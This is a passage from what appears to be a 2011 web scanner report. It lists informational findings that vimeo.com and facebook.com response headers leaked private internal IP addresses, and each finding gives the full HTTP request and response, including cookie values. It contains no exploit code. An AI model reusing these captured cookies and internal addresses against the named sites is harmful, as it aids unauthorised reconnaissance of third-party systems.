Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/f
...[SNIP]...

24.172. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=10000593&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.74
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/f
...[SNIP]...

24.173. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vimeo.com
Path:   /moogaloop.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /moogaloop.swf?clip_id=9957631&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://feeds.feedburner.com/netsparker

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:41:20 GMT
Server: Apache
X-Powered-By: PHP/5.3.6-6~dotdeb.0
Expires: Tue, 19 Jul 2011 03:41:20 GMT
X-Server: 10.90.128.68
Vary: Accept-Encoding
Content-Length: 291
Connection: close
Content-Type: application/x-shockwave-flash

FWS.#...p...........?........
.http%3A%2F%2Ffeeds.feedburner.com%2Fnetsparker.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/f
...[SNIP]...

24.174. http://www.facebook.com/advertising/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /advertising/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /advertising/?campaign_id=402047449186&placement=pflo&extra_1=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.37
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:45 GMT
Content-Length: 22238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/advertising\/index.php";window._EagleEyeSeed="42vQ";</scr
...[SNIP]...

24.175. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=115365331864877&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.54.242.37
X-Cnection: close
Date: Tue, 19 Jul 2011 16:05:37 GMT
Content-Length: 17141

for (;;);{"__ar":1,"payload":null,"css":["VYhgt","CDBlN","cMRaR"],"js":["j4mSW"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv>\\u003cul c
...[SNIP]...

24.176. http://www.facebook.com/ajax/connect/connect_widget.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/connect/connect_widget.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/connect/connect_widget.php?__a=1&id=115365331864877&uniqid=stream_loading_indicator&force_wall=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-Frame-Options: DENY
X-FB-Server: 10.55.21.57
X-Cnection: close
Date: Tue, 19 Jul 2011 16:04:38 GMT
Content-Length: 17141

for (;;);{"__ar":1,"payload":null,"css":["VYhgt","CDBlN","cMRaR"],"js":["j4mSW"],"onload":["DOM.replace(DOM.find(document.documentElement, \"#stream_loading_indicator\"), HTML(\"\\u003cdiv>\\u003cul c
...[SNIP]...

24.177. http://www.facebook.com/ajax/intl/language_dialog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.111.31
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:23 GMT
Content-Length: 42761

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/ajax\/intl\/language_dialog.php";window._EagleEyeSeed="bq
...[SNIP]...

24.178. http://www.facebook.com/ajax/prefetch.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/prefetch.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/prefetch.php?svn_rev=407015&tier=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=31536000
Content-Type: text/html;charset=utf-8
Expires: Wed, 18 Jul 2012 15:01:02 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.62.99.40
X-Cnection: close
Date: Tue, 19 Jul 2011 15:01:02 GMT
Content-Length: 7354

<!DOCTYPE html><html><head><script>document.domain = 'facebook.com';</script><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css" /><link type="tex
...[SNIP]...

24.179. http://www.facebook.com/ajax/prefetch.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/prefetch.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /ajax/prefetch.php?svn_rev=407015&tier=1 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=31536000
Content-Type: text/html;charset=utf-8
Expires: Wed, 18 Jul 2012 14:59:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.62.99.45
X-Cnection: close
Date: Tue, 19 Jul 2011 14:59:00 GMT
Content-Length: 1414

<!DOCTYPE html><html><head><script>document.domain = 'facebook.com';</script><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/VXhD5_PgFOo.css" /><link type="tex
...[SNIP]...

24.180. http://www.facebook.com/badges  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /badges?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: http://www.facebook.com/badges/?ref=pf
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.120.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 0


24.181. http://www.facebook.com/badges/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /badges/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbadges%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.92.64
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:33 GMT
Content-Length: 15265

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/badges\/index.php";window._EagleEyeSeed="emCA";</script><
...[SNIP]...

24.182. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /campaign/landing.php?campaign_id=137675572948107&partner_id=bing.com&placement=like_button&extra_1=http%3A%2F%2Fwww.bing.com%2F&extra_2=US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dnews.yahoo.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fnews.yahoo.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc; _e_FxZX_6=%5B%22FxZX%22%2C1310603126425%2C%22act%22%2C1310603126424%2C7%2C%22cancel%22%2C%22click%22%2C%22click%22%2C%22-%22%2C%22r%22%2C%22%2FBranchOutApp%3Fsk%3Dapp_131479520210618%22%2C%7B%22ft%22%3A%7B%7D%2C%22gt%22%3A%7B%7D%7D%2C717%2C213%2C20%2C1008%2C16%5D

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/r.php
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; expires=Thu, 18-Aug-2011 14:58:23 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.84.54
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:23 GMT
Content-Length: 0


24.183. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /campaign/landing.php?placement=pflo&campaign_id=402047449186&extra_1=auto HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; expires=Thu, 18-Aug-2011 14:57:43 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.30
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:43 GMT
Content-Length: 0


24.184. http://www.facebook.com/captcha/tfbimage.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /captcha/tfbimage.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /captcha/tfbimage.php?captcha_challenge_code=1311087433-f620f5659a8b44291ab316de6ed0d539&captcha_challenge_hash=AZkWniGRARLLI7KGb2Ftw8Kan6cPLcrdoIEg55_qKpS6bNqdYI6ySF6jy4rL44AzR14MD7xTDKmNJx0tj6A9TkWVfZn-xaZu_Q2MXgffN6BIrXYn7okHWiX1Jiz4eCGKboU_F5BrS3zKXCZhPeWwHjXlH0ws5-HDYH9UFWW9uF3Lygain7xK5QJlaDc42i3RoN_BT_spad3xdW9anfkmxxILmxsdW5ePttUs80ZoTCpC7LTq1G04h5J59yaZM4l2roXZxFlQB-f9MwwNfZNFFxSpV00yvmRZO9V_V6KEN6v2yoNZ5X95geU9kGN8u9RvqZlgM48Z1G1zfqxdDd4u7qerBHmyZWEUwWAs2KtWumivNfRVH9OlvYz5lXq3VCjHrYtV0SzgUdFB-_5353NQ2Qyf9s1dg6_V-dWBH7A40W7FGZwEqArTOORdr-Db3edKlqGIONJoHwzSD52sL23juV2ora8Hj4qe4wZoKNgfAPJ0nvQDHtYMXTKVaetuO73eeRI_r1RWYeAEllKNvjpxvPqeGKaIb9itsKV1EDkbPBSMgBW8A95y8gSB8K-oKKi_FOVqnxzmn1BQ2YgehemaXFqB HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/r.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/login.php?next=http%3A%2F%2Fwww.facebook.com%2Fcaptcha%2Ftfbimage.php%3Fcaptcha_challenge_code%3D1311087433-f620f5659a8b44291ab316de6ed0d539%26captcha_challenge_hash%3DAZkWniGRARLLI7KGb2Ftw8Kan6cPLcrdoIEg55_qKpS6bNqdYI6ySF6jy4rL44AzR14MD7xTDKmNJx0tj6A9TkWVfZn-xaZu_Q2MXgffN6BIrXYn7okHWiX1Jiz4eCGKboU_F5BrS3zKXCZhPeWwHjXlH0ws5-HDYH9UFWW9uF3Lygain7xK5QJlaDc42i3RoN_BT_spad3xdW9anfkmxxILmxsdW5ePttUs80ZoTCpC7LTq1G04h5J59yaZM4l2roXZxFlQB-f9MwwNfZNFFxSpV00yvmRZO9V_V6KEN6v2yoNZ5X95geU9kGN8u9RvqZlgM48Z1G1zfqxdDd4u7qerBHmyZWEUwWAs2KtWumivNfRVH9OlvYz5lXq3VCjHrYtV0SzgUdFB-_5353NQ2Qyf9s1dg6_V-dWBH7A40W7FGZwEqArTOORdr-Db3edKlqGIONJoHwzSD52sL23juV2ora8Hj4qe4wZoKNgfAPJ0nvQDHtYMXTKVaetuO73eeRI_r1RWYeAEllKNvjpxvPqeGKaIb9itsKV1EDkbPBSMgBW8A95y8gSB8K-oKKi_FOVqnxzmn1BQ2YgehemaXFqB
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:23 GMT
Content-Length: 0


24.185. http://www.facebook.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.121.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:50 GMT
Content-Length: 20897

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/careers\/index.php";window._EagleEyeSeed="Ikcl";</script>
...[SNIP]...

